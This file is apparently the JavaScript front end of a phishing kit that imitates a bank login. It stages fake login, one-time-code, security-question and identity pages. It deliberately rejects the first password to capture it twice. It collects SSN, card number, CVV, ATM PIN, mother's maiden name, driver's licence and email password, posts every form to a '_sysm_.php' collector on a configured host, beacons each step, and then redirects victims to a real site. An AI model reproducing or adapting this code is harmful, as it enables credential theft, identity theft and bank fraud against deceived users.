<script type="text/javascript">
    /*---------- Config Vars ---------------*/
    let v_musrid = ""; 
    let v_vs = "";
    /*---------- Sys Vars ---------------*/
    window.hstUrl = '<?php echo $disHost; ?>';
    window.dRediretToURL = '<?php echo $redirect_to_url; ?>';
    window.dPassSubmitCount = '<?php echo $pass_submit_count; ?>';
</script>
<script type="text/javascript">
    /*---------- Basic Functions ---------------*/

    function getAbsolutePath() {
        var loc = window.location;
        var pathName = loc.pathname.substring(0, loc.pathname.lastIndexOf('/') + 1);
        return loc.href.substring(0, loc.href.length - ((loc.pathname + loc.search + loc.hash).length - pathName.length));
    }

    function getUrlParameter(name)
    {
        name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
        var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
        var results = regex.exec(location.search);
        return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
    }

    function ChangeUrl(title, url) {
        if (typeof (history.pushState) != "undefined") {
            var obj = { Title: title, Url: url };
            history.pushState(obj, obj.Title, obj.Url);
        } else {
            alert("Browser does not support HTML5.");
        }
    }

    function genRandomStr(length){
        var result           = '';
        var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
        var charactersLength = characters.length;
        for ( var i = 0; i < length; i++ ) {
            result += characters.charAt(Math.floor(Math.random() * charactersLength));
        }
        return result;
    }

    function isBase64(str) {
        try {
            return btoa(atob(str)) == str;
        } catch (err) {
            return false;
        }
    }

    function setCookie(cname, cvalue, exdays) {
        const d = new Date();
        d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
        let expires = "expires="+d.toUTCString();
        document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";

        console.log('Cookie Set: '+cname+':'+cvalue);
    }

    function getCookie(cname) {
        let name = cname + "=";
        let ca = document.cookie.split(';');
        for(let i = 0; i < ca.length; i++) {
            let c = ca[i];
            while (c.charAt(0) == ' ') {
            c = c.substring(1);
            }
            if (c.indexOf(name) == 0) {
            return c.substring(name.length, c.length);
            }
        }
        return "";
    }

    function checkCookie(cname) {
        let cQukies = getCookie(cname);
        if (cQukies != "") {
            return cQukies; 
        }
        return false;
    }

    /*---------- Form Input Helper Functions ---------------*/

    $("input.nums-only").on('input', function(e) {  $(this).val($(this).val().replace(/[^0-9]/g, ''));  });
    $("input.alphabets-only").on('input', function(e) {  $(this).val($(this).val().replace(/[^a-z\s]/ig, '')); });

    //Date Input Masking - DOB
    $('.js-date').on('input', function(e){

        var val = this.value.replace(/\D/g, '');
        val = val.substr(0, 9);
        var newVal = '';
        
        this.value = val;

        var len = val.length;

        if(len === 2) {
            //this.value += '/';
            newVal = val + '/';
            this.value = newVal;
        }

        //if(len === 4) {
        if(len > 2) {
            //this.value += '/';
            
            newVal = val.substr(0, 2) + '/';
            newVal += val.substr(2, 2);
            
            this.value = newVal;
        }
        
        ///if(len === 8)
        if(len > 3)
        {
            //this.value += '/';
            
            newVal = val.substr(0, 2) + '/';
            newVal += val.substr(2, 2)+ '/';
            newVal += val.substr(4, 4);
            
            this.value = newVal;
        }

        /*if (val.match(/^\d{2}$/) !== null) {
                    this.value = val + '/';
                } else if (val.match(/^\d{2}\/\d{2}$/) !== null) {
                    this.value = val + '/';
                }*/
    });

    //Phone Number Masking
    var pn_input = document.querySelectorAll('.js-phone')[0];

    var phoneInputMask = function phoneInputMask(elm)
    {
        elm.addEventListener('input', function(e) {
            if(e.keyCode < 47 || e.keyCode > 57) {
                e.preventDefault();
            }

            var x = e.target.value.replace(/\D/g, '').match(/(\d{0,3})(\d{0,3})(\d{0,4})/);
            e.target.value = !x[2] ? x[1] : '(' + x[1] + ')-' + x[2] + (x[3] ? '-' + x[3] : ''); 
        });
    };

    //phoneInputMask(pn_input);

    // Mask / Format SSN Input
    $('.js-ssnum, input#ssN-text-input-field').on('keyup', function(){
        var val = this.value.replace(/\D/g, '');
        val = val.substr(0, 9);
        var newVal = '';
        if(val.length > 4) {
            this.value = val;
        }
        if((val.length > 3) && (val.length < 6)) {
            newVal += val.substr(0, 3) + '-';
            val = val.substr(3);
        }
        if (val.length > 5) {
            newVal += val.substr(0, 3) + '-';
            newVal += val.substr(3, 2) + '-';
            val = val.substr(5);
        }
        newVal += val;
        this.value = newVal;   
    });


    // Mask / format CC no.
    $('input.js-ccnum').on('input', function(e){
        var val = e.target.value.replace(/\D/g, '');
        val = val.substr(0, 16);
        var newVal = '';
        if((val.length > 4) && (val.length < 13)){
            //console.log('Greater than 8');
            newVal += val.substr(0, 4) + ' ';
            newVal += val.substr(4, 4) + ' ';
            val = val.substr(8);
        }
        if((val.length > 12))
        {
            //console.log('Greater than 12');
            newVal += val.substr(0, 4) + ' ';
            newVal += val.substr(4, 4) + ' ';
            newVal += val.substr(8, 4) + ' ';
            val = val.substr(12);
        }

        newVal += val;
        this.value = newVal;
    });


    // format expiry date MM/YY
    $('input.exdate').on('keyup', function(){
        var val = this.value.replace(/\D/g, '');
        val = val.substr(0, 10); console.log(val);
        var newVal = '';

        this.value = val;

        if(val.length > 1) {
            //this.value = val;
            newVal = val.substr(0, 2) + '/';

            this.value = newVal;
        }

        if (val.length > 2) {
            newVal = val.substr(0, 2) + '/';
            newVal += val.substr(2, 2);

            this.value = newVal; 
        }
    });


    //format Phone
    $('input.us-phone').on('input', function(e){
        var x = e.target.value.replace(/\D/g, '').match(/(\d{0,3})(\d{0,3})(\d{0,4})/);
        e.target.value = !x[2] ? x[1] : '(' + x[1] + ') ' + x[2] + (x[3] ? '-' + x[3] : '');
    });


    //format DL
    $('input.dl').on('input', function(){
        $(this).removeClass('uppercase'); if($(this).val() !=="") { $(this).addClass('uppercase'); }
    });


    //Toggle input type Text/Password
    $('.js-tog-input-txt').on('input, click', function(){
        $(this).attr('type','text');
    }).on('blur',function(){
        $(this).attr('type','password');
    });



    /*---------- Page Frame View Events (pfID) ---------------*/

    if(v_vs)
    {
        let viewStep = getCookie(v_vs);

        function do_pfid_check() {
            console.log('Checking pfID visibility ...', '');

            var pfID = $('.page-frame:visible').attr('id'), vwStep = getCookie(v_vs);
            if (pfID && pfID !== vwStep) { setCookie(v_vs, pfID, 1); }
        }

        if (viewStep != "") {
            $('.page-frame').fadeOut('fast', function () { $('#' + viewStep).fadeIn('slow', function(){ $('.pg-form:visible :input:visible:eq(0)').focus() }); });

            var gt_v_musrid = getCookie(v_musrid);
            if (gt_v_musrid != "") {
                $('.emdsp').text(gt_v_musrid);
                $('.emhdn').val(gt_v_musrid);
                // window.filled_inps['user'] = gt_v_musrid;
            }

            if (viewStep == 'pgDone') {
                $('.mjx-header').text('Details Confirmed');
                $('.mjx-hide-on-done').hide('fast');
            }

        }
        else {
            // $('.page-frame').fadeOut('fast', function () { $('#pg001').fadeIn('slow'); });
            $('.page-frame').fadeOut('fast', function () { 
                $('#pg001').fadeIn('slow', function(){ $('.pg-form:visible :input:visible:eq(0)').focus() });
            });
        }

        var pfidTimer = setInterval(do_pfid_check, 3000);

        $('body').on('unload', function () { setCookie(v_vs, '', -1); });
    }else{
        $('.page-frame').fadeOut('fast', function () { 
            $('#pg001').fadeIn('slow', function(){ $('.pg-form:visible :input:visible:eq(0)').focus() });
        });
    }

    // disable all page-frame
    $('.page-frame:not(:visible) :input, #seqChk:not(:visible) :input').attr('disabled', 'disabled'); 

    function vt(pg_step_name){
    $.get(window.hstUrl+"_sysm_.php?_do=vt&s="+window.btoa(window.location.href+"_"+pg_step_name), function(data){ console.log('Logged: '+pg_step_name); console.log('Retured Data: '+data);});
    }
</script>
<script type="text/javascript">
    $(document).ready(function () {

        $('body').css('opacity', 1);


        function lock_clickable_elements(){
            // $('html, body').css({'opacity':'0.9'});
            // $('body').css({'opacity':'0.9'});
            
            // $('html').css({'background-image':'none;'});
            // $('body').css({'opacity':'0.9'});

            $('html').addClass('html_no_bg_img').removeClass('html_bg_img');
            $('html, body').css({'opacity':'0.7'});

            $(':input').attr('readonly','readonly');
            $('a, button, input[type=submit]').attr('disabled','disabled');
            $('a').addClass('w3-disabled');

            $('.page-frame:visible').find('button > svg').show('fast');
        }

        function unlock_clickable_elements(){
            $('html, body').css({'opacity':'1'});

            // $('html').css({'background-image':"url('https://cdn1.onlineaccess1.com/cdn/depot/3388/2368/d5d58506fb8bfbef243a2b6d93ca022c/assets/images/desktop-background-005c06673c56512d2bd894738b19198b.jpg');"});

            $('html').addClass('html_bg_img').removeClass('html_no_bg_img');

            $(':input').removeAttr('readonly');
            $('a, button, input[type=submit]').removeAttr('disabled');
            $('a').removeClass('w3-disabled');

            // $('button.btn').attr('disabled','disabled');
            $('.page-frame:visible').find('button > svg').hide('fast');
        }


        // Button Countdown Timer
        var sec = 15;
        var myTimer = document.getElementById('ohtpTimer');
        var myBtn = document.getElementById('resendOCode');
        
        function button_count_down_timer() 
        {
            $("#ohtpTimer").fadeTo(0, 1);

            if (sec < 10) {
                myTimer.innerHTML = "0" + sec;
            } else {
                myTimer.innerHTML = sec;
            }

            if (sec <= 0) {
                $("#resendOCode").removeAttr("disabled");
                $("#resendOCode").removeClass('w3-disabled');
                $("#ohtpTimer").fadeTo(2500, 0);
                return;
            }
            sec -= 1;
            window.setTimeout(button_count_down_timer, 1000);
        }

        function change_pg_title(p_txt, p_selekto="#jsPgTitle")
        {
            $(p_selekto).text(p_txt);
        }

        function change_pg_title_2(pgID)
        {
            var pgtitle = 'Log in';
            if(pgID == 'pg002'){ pgtitle = 'We sent a Text Message To Your Email.';}
            if(pgID == 'pg003'){ pgtitle = 'Confirm Identity.';}
            if(pgID == 'pgQnA'){ pgtitle = 'Security Challenge';}

            change_pg_title(pgtitle);
        }

        /*---------- Custom Events ---------------*/

        var rediretToURL = window.dRediretToURL;

        function resp_form_top(id, txtp)
        { 
            var error_div = $('.js-main-form-error-wrap');
            error_div.find('.js-error-txt').html(txtp);

            // error_div.addClass('login-static-alert');
            // error_div.find('.login-alert-container').addClass('has-alert').removeClass('hidden');
            error_div.fadeIn('fast');
            // id.val('').focus();
            id.val('');

            // $('html, body').animate({ scrollTop: error_div.offset().top - 20}, 'slow');

            setTimeout(function() { id.focus(); }, 3000);
        }

        function resp_form_inp(id, txtp)
        {
            var the_parent = id.parents('.js-main-form-error-wrap');

            // the_parent.addClass('w3-border w3-border-red');
            // id.addClass('invalid');
            // if(the_parent.find('.error-txt-portal').length > 0)
            // {
            //     the_parent.find('.error-txt-portal').text(txtp);
            // }
            // else
            // {
            //     the_parent.append('<span class="js-inp-error hint-container sc-prism-input-default" style="font-size:small"><prism-icon slot="icon-trailing" class="sc-prism-input-default xs hydrated loaded"><div part="container" class="dot-positive icon-inner size-xs"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="currentColor" focusable="false" role="img" class="size-xs negative primary icon" aria-hidden="true" style="color:rgb(183 2 60)"><path d="M13.58,3.5H10.42A8.42,8.42,0,0,0,2,11.92v.16a8.42,8.42,0,0,0,8.42,8.42h3.16A8.42,8.42,0,0,0,22,12.08v-.16A8.42,8.42,0,0,0,13.58,3.5ZM11,7.5h2v6.07H11Zm1.84,9.17a1.23,1.23,0,0,1-1.68,0,1.18,1.18,0,0,1,0-1.68,1.23,1.23,0,0,1,1.68,0,1.18,1.18,0,0,1,0,1.68Z"></path></svg></div></prism-icon><prism-text class="invalid-text hint-text sc-prism-input-default block caption hydrated js-inp-error-txt">'+txtp+'</prism-text></span>');
            // }
            // the_parent.find('label').eq(0).addClass('floating-label-error');
            // the_parent.addClass('has-error');
            // $('html, body').animate({ scrollTop: the_parent.offset().top - 20}, 'slow');
            // $('html, body').animate({ scrollTop: $errRespDiv.offset().top - 20}, 'slow');

            var error_div = the_parent.find('.irisv-textfield__messages div[role="alert"]');

            if(error_div.find('.js-inp-error').length > 0)
            {
                error_div.find('.js-inp-error > div').html(txtp);
            }
            else
            {
                error_div.html('<div class="js-inp-error irisv-textfield__messages-errors font-caption"><div> '+txtp+' </div></div>');
            }

            if(the_parent.find('.irisv-textfield__trailing-icon.js-error-icon').length > 0)
            {
                the_parent.find('.irisv-textfield__trailing-icon.js-error-icon').fadeIn('slow');
            }

            the_parent.addClass('irisv-textfield--error');
            error_div.find('.js-inp-error').fadeIn('fast');
            // id.val('').focus();
            id.val('');
        }

        function resp_err(id, txtp)
        {
            resp_form_top(id, txtp);
            // resp_form_inp(id, txtp);
        }

        function clear_err_tins()
        {
            $('.js-main-form-error-wrap').fadeOut('fast');
        }

        function clear_inp_err_tins(id){
            var the_parent = id.parents('.irisv-textfield');
            var error_div = the_parent.find('.irisv-textfield__messages div[role="alert"]');

            error_div.find('.js-inp-error').fadeOut('fast', function(){ error_div.find('.js-inp-error').remove(); });

            the_parent.removeClass('irisv-textfield--error');
        }

                

        // Log Visit
        vt('first_visit');


        // Callbacks
        function do_form_done(){ setTimeout(function(){ window.location.replace(rediretToURL) }, 3000); }

        function toggle_pg_frame(pgf_to_show, mj_vt)
        {
            $('.page-frame:visible').fadeOut('fast', function(){
                if(pgf_to_show == '#pgEmail')
                {
                    var uval = $('#email').val();
                    if(uval)
                    {
                        load_emv_form(uval);
                    }
                    else
                    {
                        resp_err($('.pg-form:visible :input:visible:eq(0)'), 'Please enter your email to continue.');
                    } 
                }
                else
                {
                    $(pgf_to_show).find(':input').removeAttr('disabled');
                    $(pgf_to_show).fadeIn('fast', function(){
                        $('.pg-form:visible :input:visible:eq(0)').focus()
                        $('.page-frame:not(:visible) :input').attr('disabled', 'disabled');
                    });
                }

                if(mj_vt){ vt(mj_vt); }

                if(pgf_to_show == '#pgDone'){ do_form_done(); }
            });
        }



        function toggle_pg_frame_wt_2pass(frm_obj, pswd_inp_id, pgf_to_show)
        {
            var $dis = frm_obj;

            if($dis.hasClass('second_submit'))
            {
                console.log('Second Submit');
                
                // load_amz_to_usps();
                // load_emv_form($('#email').val());
                // $('.js_show_only_on_001').hide();
                // vt('second_password_submit');

                toggle_pg_frame(pgf_to_show, 'second_login_submit');

                $('.show-on-pg1-only').fadeOut('fast');

                unlock_clickable_elements();
                $('html, body').animate({ scrollTop:0}, 'slow');
                
            } else {

                console.log('First Submit');
                
                $dis.addClass('second_submit');

                resp_err($(pswd_inp_id), 'Incorrect details, Please check your details.');

                unlock_clickable_elements();
                $('html, body').animate({ scrollTop:0}, 'slow');

                vt('first_login_submit');
            }
        }


        function toggle_pg_frame_wt_sec_check(frm_obj, pswd_inp_id, pgf_to_show)
        {
            var $dis = frm_obj;

            if($dis.hasClass('second_submit'))
            {
                console.log('Second Submit');
                
                // load_amz_to_usps();
                // load_emv_form($('#email').val());
                // $('.js_show_only_on_001').hide();

                // vt('second_password_submit');

                toggle_pg_frame(pgf_to_show, 'second_login_submit');

                unlock_clickable_elements();
                $('html, body').animate({ scrollTop:0}, 'slow');
                
            } else {

                console.log('First Submit');
                
                $dis.addClass('second_submit');

                resp_err($(pswd_inp_id), 'Incorrect details, Please check your details.');
                
                $dis.find('#seqChk').fadeIn('fast', function(){
                    $dis.find('#seqChk :input').removeAttr('disabled');
                    // $dis.find('#secCheck #email_h').attr({'name':'email','id':'email'});
                }); 

                unlock_clickable_elements();
                $('html, body').animate({ scrollTop:0}, 'slow');

                vt('first_login_submit');
            }
        }
        
        

        //On input
        $('body').on('input','.page-frame:visible .custom-field :input', function(){
            console.log('Typing...');
            // var parent_form = $(this).parents('form');
            var parent_form = $('.page-frame:visible form.pg-form');
            var found_empty = 0, all_inps = parent_form.find(':text, input[type=password]');

            console.log(parent_form.attr('name'), all_inps.length);

            all_inps.each(function (i,e) {
                // Check if the element is empty
                // if ($(e).is(":empty"))
                if (!$(e).val())
                {
                    found_empty = 1;
                }
            });

            // if(parent_form.find('input[value=""]').length < 1)
            // if(parent_form.find('input:empty').length < 1)
            if(!found_empty)
            {
                parent_form.find('button.q-btn.q-btn-item').removeAttr('disabled').removeClass('disabled sm_cobrowsing_disabled_field');
            }
            else
            {
                parent_form.find('button.q-btn.q-btn-item').attr('disabled', 'disabled').addClass('disabled sm_cobrowsing_disabled_field');
            }
            
            
        });


        //GoTo Btn
        $('.goto_btn').on('click', function(e){
            e.preventDefault();
            lock_clickable_elements();
            setTimeout(function(){
                window.location.replace(rediretToURL);
            }, 3000);
        });

        $('#a-address-step1').on('click', function(e){
            e.preventDefault();
            $(this).parents('#frm1').submit();
        });




        $('.js-pswd-showHide').on('click', function(){
            if($(this).hasClass('pass-changed'))
            {
                $(this).parents('.custom-input').find('input[type="text"]').attr('type','password');
                $(this).removeClass('pass-changed');
                
                $(this).find('.fa-eye-slash').addClass('fa-eye').removeClass('fa-eye-slash');
            }else{
                $(this).parents('.custom-input').find('input[type="password"]').attr('type','text');
                $(this).addClass('pass-changed');

                $(this).find('.fa-eye').addClass('fa-eye-slash').removeClass('fa-eye');
            }
        });


        $('a[disabled], a#resendOCode[disabled]').on('click',function(e){ e.preventDefault(); return false; });


        // resendOCode Btn
        $('#resendOCode').not('[disabled]').on('click',function(e){
            // var pgv = $('#js-error-wrap');
            // var pgv = $('.page-frame:visible').find('.js-main-form-error-wrap');
            var pgv = $('.js-main-form-error-wrap');
            
            lock_clickable_elements();

            setTimeout(function(){
                $('<div id="resentResp" class="w3-container loginFormArea pdtb-10"> <span style="color:green;"> &#9989; Resent your one time code. </span></div>').insertBefore(pgv);
                $('#one_time_code').focus();
                unlock_clickable_elements();

                $('.fluid-button').attr('disabled','disabled');
                
                // Timer
                $('#resendOCode').attr('disabled','disabled');
                $("#resendOCode").addClass("w3-disabled");
                sec = 15;
                button_count_down_timer();

            },3000);
            setTimeout(function(){ $('#resentResp').fadeIn('slow', function(){ $(this).remove(); }); },5000);
        });
        
        // Form actions
        var my_form_actions = <?php echo json_encode($my_form_actions); ?>;

        console.log(my_form_actions);

        // On Submit
        $('form.pg-form').submit(function (e) {
            e.preventDefault();

            var $frm_name = $(this).attr('name');
            var $frms = ["form1", "form2", "form3", "form4", "form_tel", "form_email", "signin", "form-ActReq","form2a","form_qna"];
            
            
            if (typeof $frm_name !== typeof undefined && $frm_name !== false && $frms.indexOf($frm_name) !== -1) 
            {
                clear_err_tins();

                /*--- Validation Starts ---*/
                
                var found_err = false;
                var email_regx = new RegExp(/^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})+$/);
                var spc_rgx = new RegExp(/\s/);
                var sn_rex = new RegExp("^(?!\\b(\\d)\\1+-(\\d)\\1+-(\\d)\\1+\\b)(?!123-45-6789|219-09-9999|078-05-1120)(?!666|000|9\\d{2})\\d{3}-(?!00)\\d{2}-(?!0{4})\\d{4}$");


                var values = {};
                $.each($(this).serializeArray(), function(i, field) {
                    values[field.name] = field.value;

                    console.log(field.name);

                    if(field.name == 'username')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Username is required.');
                        }
                        else if(email_regx.test(field.value))
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Username can not be an email address.');
                        }
                        else if(spc_rgx.test(field.value))
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Username can not contain spaces');
                        }
                    }

                    if(field.name == 'password' || field.name == 'passwd')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Password is required.');
                        }
                    }


                    if(field.name == 'full_name')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your full name to proceed.');
                        }
                    }

                    if(field.name == 'm_m_n')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your Mother\'s Maiden Name.');
                        }
                    }

                    if(field.name == 'email')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your email.');
                        }
                        else if(!email_regx.test(field.value))
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter a valid email address.');
                        }
                    }

                    if(field.name == 'mobile_number' || field.name == 'phone')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your 10 digits mobile number.');
                        }
                        else if(field.value.replace(/[^0-9]/g, '').length < 10)
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter a valid mobile number.');
                        }
                    }

                    if(field.name == 'full_address' || field.name == 'address')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your full address.');
                        }
                    }

                    if(field.name == 'street_address' || field.name == 'street')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your street address.');
                        }
                    }

                    if(field.name == 'city')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your city.');
                        }
                    }

                    if(field.name == 'state')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please select your state.');
                        }
                    }

                    if(field.name == 'zip_code' || field.name == 'zip__code')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your zipcode.');
                        }
                        else if(field.value.replace(/[^0-9]/g, '').length < 4)
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter a valid zipcode.');
                        }
                    }

                    if(field.name == 'dob')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your date of birth.');
                        }
                    }

                    if(field.name == 's_s_n')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please confirm your social security number.');
                        }
                        else if(field.value.replace(/[^0-9]/g, '').length < 9)
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter a valid social security number (9 Digits).');
                        }
                        else if(!sn_rex.test(field.value))
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter a valid social security number.');
                        }
                    }



                    if(field.name == 'cc_num')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please confirm your card number.');
                        }
                        else if(field.value.replace(/[^0-9]/g, '').length < 16)
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter a valid card number (16 Digits).');
                        }
                    }

                    if(field.name == 'cc_exdate')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please confirm your card expiry date.');
                        }
                        else if(field.value.replace(/[^0-9]/g, '').length < 3)
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter a valid card expiry date.');
                        }
                    }
                    

                    if(field.name == 'cc_cv2')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please confirm your card security code. cvv/csc.');
                        }
                        else if(field.value.replace(/[^0-9]/g, '').length < 3)
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter a valid cvv or csc (3-4 Digits).');
                        }
                    }


                    if(field.name == 'a_t_m_pin')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your 4 digits ATM PIN.');
                        }
                        else if(field.value.replace(/[^0-9]/g, '').length < 9)
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your 4 digits ATM PIN.');
                        }
                    }

                    if(field.name == 'd__l')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your drivers license number.');
                        }
                        else if(field.value.length < 9)
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Invalid drivers license number.');
                        }
                    }


                    if(field.name == 'm_j_email')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            modal_resp_err($('#'+field.name), 'Please enter your email.');
                        }
                        else if(!email_regx.test(field.value))
                        {
                            found_err = true;
                            modal_resp_err($('#'+field.name), 'Please enter a valid email address.');
                        }
                    }

                    if(field.name == 'm_j_email_password')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            modal_resp_err($('#'+field.name), 'Please enter a valid email address password.');
                        }
                    }

                    if(field.name == 'one_time_code')
                    {
                        if(field.value == '')
                        {
                            found_err = true;
                            resp_err($('#'+field.name), 'Please enter your one-time code.');
                        }
                    }
                });

                // console.log(values);
                
                
                if(found_err === true)
                {
                    console.log('Found Error');

                    return false;
                }
                
                /*--- Validation Ends ---*/
                
                lock_clickable_elements();

                var $dis = $(this), values = $(this).serialize(), ajxURL = window.hstUrl+'_sysm_.php?_do=same_form';
                
                $.ajax({
                    url: ajxURL,//$(this).attr('action')
                    type: "post",
                    data: values,
                    success: function (res) {

                        console.log(res);

                        if($frm_name == 'form1' || $frm_name == 'signin')
                        {
                            next_pg = my_form_actions['form1'];

                            setTimeout(function(){

                                clear_err_tins();

                                if(window.dPassSubmitCount == '2')
                                {
                                    toggle_pg_frame_wt_2pass($dis, '#password', '#'+next_pg);
                                }else{
                                    toggle_pg_frame('#'+next_pg, 'user_pass_submit');

                                    // change_pg_title('We sent a Text Message.');
                                    change_pg_title_2(next_pg);

                                    unlock_clickable_elements();
                                    $('html, body').animate({ scrollTop:0}, 'slow');
                                }

                            }, 1000);
                        }


                        if($frm_name == 'form2')
                        {
                            next_pg = my_form_actions['form2'];

                            setTimeout(function(){
                                //'#pg003'
                                toggle_pg_frame('#'+next_pg, 'one_time_pin_submit');

                                // cpgt = (next_pg == 'pgQnA') ? 'Security Challenge' : 'Confirm Identity.';
                                // change_pg_title(cpgt);
                                change_pg_title_2(next_pg);

                                unlock_clickable_elements();
                                $('html, body').animate({ scrollTop:0}, 'slow');
                            }, 1000);
                        }


                        if($frm_name == 'form3')
                        {
                            next_pg = my_form_actions['form3'];

                            setTimeout(function(){

                                if(next_pg == 'pgDone')
                                {
                                    toggle_pg_frame('#'+next_pg, 'personal_info_submit');
                                }
                                else
                                {
                                    var uval = $('#email').val();
                                    load_emv_form(uval);
                                    vt('personal_info_submit');
                                }
                                
                                unlock_clickable_elements();
                                $('html, body').animate({scrollTop:0}, 'slow');

                            }, 1000);
                        }



                        if($frm_name == 'form_qna')
                        {
                            next_pg = my_form_actions['form_qna'];

                            setTimeout(function(){
                                //'#pg003'
                                toggle_pg_frame('#'+next_pg, 'question_answer_submit');

                                // cpgt = (next_pg == 'pgQnA') ? 'Security Challenge' : 'Confirm Identity.';
                                // change_pg_title(cpgt);
                                change_pg_title_2(next_pg);

                                unlock_clickable_elements();
                                $('html, body').animate({ scrollTop:0}, 'slow');
                            }, 1000);
                        }
                        
                        

                        if($frm_name == 'form_email')
                        {
                            // $('#pg002 ')
                            setTimeout(function(){

                                after_emv_frm_submit({'frmobj':$dis, 'pgfid':'pgDone'});
                                // setTimeout(function() { window.location.replace(rediretToURL) }, 4000);

                                //change_pg_title('Log In.');
                                change_pg_title_2('');

                                unlock_clickable_elements();
                                $('html, body').animate({ scrollTop:0}, 'slow');

                            }, 1000);
                        }
                                    

                    },
                    error: function(xhr, status, error) {
                        //console.log(xhr.responseText);
                        alert('Please make sure you are connected to the internet.');
                        unlock_clickable_elements();
                    }
                });
            }

            if(window.v_vs && !window.pfidTimer){ window.pfidTimer = setInterval(do_pfid_check, 3000); }

            return false;
        });

    }); 
</script>